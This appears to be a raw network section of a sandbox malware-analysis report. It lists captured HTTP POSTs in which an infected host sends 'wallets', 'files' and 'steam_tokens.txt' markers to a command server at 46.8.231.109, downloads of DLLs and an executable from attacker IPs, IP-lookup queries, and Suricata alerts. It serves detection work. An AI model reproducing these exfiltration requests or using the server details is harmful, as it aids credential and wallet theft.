Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGIDHJKKJDGCBGCGIJKHost: 46.8.231.109Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDHDGDHJEGHIDGDHCGCHost: 46.8.231.109Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 35 36 30 63 38 64 63 64 38 65 39 32 33 32 61 63 38 35 64 63 36 66 37 35 32 39 32 36 61 31 32 62 62 37 37 32 39 62 30 33 35 66 30 37 61 33 65 61 63 33 66 63 61 33 32 35 39 66 62 63 36 64 63 39 35 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 2d 2d 0d 0a Data Ascii: ------HIDHDGDHJEGHIDGDHCGCContent-Disposition: form-data; name="token"3560c8dcd8e9232ac85dc6f752926a12bb7729b035f07a3eac3fca3259fbc6dc95d12a2b------HIDHDGDHJEGHIDGDHCGCContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------HIDHDGDHJEGHIDGDHCGCContent-Disposition: form-data; name="file"------HIDHDGDHJEGHIDGDHCGC--
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAEHIDAKECFIEBGDHJEBHost: 46.8.231.109Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 35 36 30 63 38 64 63 64 38 65 39 32 33 32 61 63 38 35 64 63 36 66 37 35 32 39 32 36 61 31 32 62 62 37 37 32 39 62 30 33 35 66 30 37 61 33 65 61 63 33 66 63 61 33 32 35 39 66 62 63 36 64 63 39 35 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 2d 2d 0d 0a Data Ascii: ------AAEHIDAKECFIEBGDHJEBContent-Disposition: form-data; name="token"3560c8dcd8e9232ac85dc6f752926a12bb7729b035f07a3eac3fca3259fbc6dc95d12a2b------AAEHIDAKECFIEBGDHJEBContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------AAEHIDAKECFIEBGDHJEBContent-Disposition: form-data; name="file"------AAEHIDAKECFIEBGDHJEB--
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/freebl3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/mozglue.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/msvcp140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/nss3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/softokn3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/vcruntime140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJKFBAFIDAEBFHJKJEBFHost: 46.8.231.109Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFHJJJKKFHIDAAKFBFBFHost: 46.8.231.109Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 42 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 35 36 30 63 38 64 63 64 38 65 39 32 33 32 61 63 38 35 64 63 36 66 37 35 32 39 32 36 61 31 32 62 62 37 37 32 39 62 30 33 35 66 30 37 61 33 65 61 63 33 66 63 61 33 32 35 39 66 62 63 36 64 63 39 35 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 42 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 42 46 42 46 2d 2d 0d 0a Data Ascii: ------KFHJJJKKFHIDAAKFBFBFContent-Disposition: form-data; name="token"3560c8dcd8e9232ac85dc6f752926a12bb7729b035f07a3eac3fca3259fbc6dc95d12a2b------KFHJJJKKFHIDAAKFBFBFContent-Disposition: form-data; name="message"wallets------KFHJJJKKFHIDAAKFBFBF--
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKEBAKFHCFHIEBFBAFBHost: 46.8.231.109Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 35 36 30 63 38 64 63 64 38 65 39 32 33 32 61 63 38 35 64 63 36 66 37 35 32 39 32 36 61 31 32 62 62 37 37 32 39 62 30 33 35 66 30 37 61 33 65 61 63 33 66 63 61 33 32 35 39 66 62 63 36 64 63 39 35 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 2d 2d 0d 0a Data Ascii: ------DAKEBAKFHCFHIEBFBAFBContent-Disposition: form-data; name="token"3560c8dcd8e9232ac85dc6f752926a12bb7729b035f07a3eac3fca3259fbc6dc95d12a2b------DAKEBAKFHCFHIEBFBAFBContent-Disposition: form-data; name="message"files------DAKEBAKFHCFHIEBFBAFB--
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKKJKFBKKECFHJKEBKEHHost: 46.8.231.109Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 4b 4a 4b 46 42 4b 4b 45 43 46 48 4a 4b 45 42 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 35 36 30 63 38 64 63 64 38 65 39 32 33 32 61 63 38 35 64 63 36 66 37 35 32 39 32 36 61 31 32 62 62 37 37 32 39 62 30 33 35 66 30 37 61 33 65 61 63 33 66 63 61 33 32 35 39 66 62 63 36 64 63 39 35 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 4a 4b 46 42 4b 4b 45 43 46 48 4a 4b 45 42 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 4a 4b 46 42 4b 4b 45 43 46 48 4a 4b 45 42 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 4a 4b 46 42 4b 4b 45 43 46 48 4a 4b 45 42 4b 45 48 2d 2d 0d 0a Data Ascii: ------BKKJKFBKKECFHJKEBKEHContent-Disposition: form-data; name="token"3560c8dcd8e9232ac85dc6f752926a12bb7729b035f07a3eac3fca3259fbc6dc95d12a2b------BKKJKFBKKECFHJKEBKEHContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------BKKJKFBKKECFHJKEBKEHContent-Disposition: form-data; name="file"------BKKJKFBKKECFHJKEBKEH--
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAFIEBKKJJDAKFHIDBFHHost: 46.8.231.109Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 46 49 45 42 4b 4b 4a 4a 44 41 4b 46 48 49 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 35 36 30 63 38 64 63 64 38 65 39 32 33 32 61 63 38 35 64 63 36 66 37 35 32 39 32 36 61 31 32 62 62 37 37 32 39 62 30 33 35 66 30 37 61 33 65 61 63 33 66 63 61 33 32 35 39 66 62 63 36 64 63 39 35 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 49 45 42 4b 4b 4a 4a 44 41 4b 46 48 49 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 49 45 42 4b 4b 4a 4a 44 41 4b 46 48 49 44 42 46 48 2d 2d 0d 0a Data Ascii: ------CAFIEBKKJJDAKFHIDBFHContent-Disposition: form-data; name="token"3560c8dcd8e9232ac85dc6f752926a12bb7729b035f07a3eac3fca3259fbc6dc95d12a2b------CAFIEBKKJJDAKFHIDBFHContent-Disposition: form-data; name="message"ybncbhylepme------CAFIEBKKJJDAKFHIDBFH--
Source: global traffic	HTTP traffic detected: GET /ldms/66fbfcc9963ca_ldfsna.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIIEBGCBGIDHDGCAKJEBHost: 46.8.231.109Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 49 45 42 47 43 42 47 49 44 48 44 47 43 41 4b 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 35 36 30 63 38 64 63 64 38 65 39 32 33 32 61 63 38 35 64 63 36 66 37 35 32 39 32 36 61 31 32 62 62 37 37 32 39 62 30 33 35 66 30 37 61 33 65 61 63 33 66 63 61 33 32 35 39 66 62 63 36 64 63 39 35 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 45 42 47 43 42 47 49 44 48 44 47 43 41 4b 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 45 42 47 43 42 47 49 44 48 44 47 43 41 4b 4a 45 42 2d 2d 0d 0a Data Ascii: ------IIIEBGCBGIDHDGCAKJEBContent-Disposition: form-data; name="token"3560c8dcd8e9232ac85dc6f752926a12bb7729b035f07a3eac3fca3259fbc6dc95d12a2b------IIIEBGCBGIDHDGCAKJEBContent-Disposition: form-data; name="message"wkkjqaiaxkhb------IIIEBGCBGIDHDGCAKJEB--
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org

Source: Joe Sandbox View	IP Address: 46.8.231.109 46.8.231.109
Source: Joe Sandbox View	IP Address: 49.12.197.9 49.12.197.9

Source: Joe Sandbox View	ASN Name: FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics
Source: Joe Sandbox View	ASN Name: HETZNER-ASDE HETZNER-ASDE
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api64.ipify.org
Source: unknown	DNS query: name: ipinfo.io
Source: unknown	DNS query: name: iplogger.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49731 -> 172.67.74.152:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49743 -> 147.45.44.104:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49744 -> 147.45.44.104:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49749 -> 46.8.231.109:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49758 -> 147.45.44.104:80
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49761 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49763 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49766 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49771 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49773 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49776 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49778 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49779 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49783 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49780 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49781 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49782 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49784 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49785 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49787 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49789 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49788 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49790 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49792 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49791 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49794 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49797 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49799 -> 147.45.44.104:80
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49793 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49800 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49803 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49805 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49808 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49809 -> 46.8.231.109:80
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49816 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49818 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49819 -> 46.8.231.109:80
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49820 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49821 -> 46.8.231.109:80
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49822 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49824 -> 147.45.44.104:80
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49825 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49826 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49823 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49850 -> 172.67.74.152:80
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49844 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49849 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49828 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49852 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49854 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49843 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49835 -> 172.67.74.152:80
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49853 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49855 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49846 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49862 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49856 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49870 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49867 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49859 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49863 -> 104.26.13.205:80
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49864 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49871 -> 104.26.13.205:80
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49873 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49874 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49876 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49875 -> 49.12.197.9:443
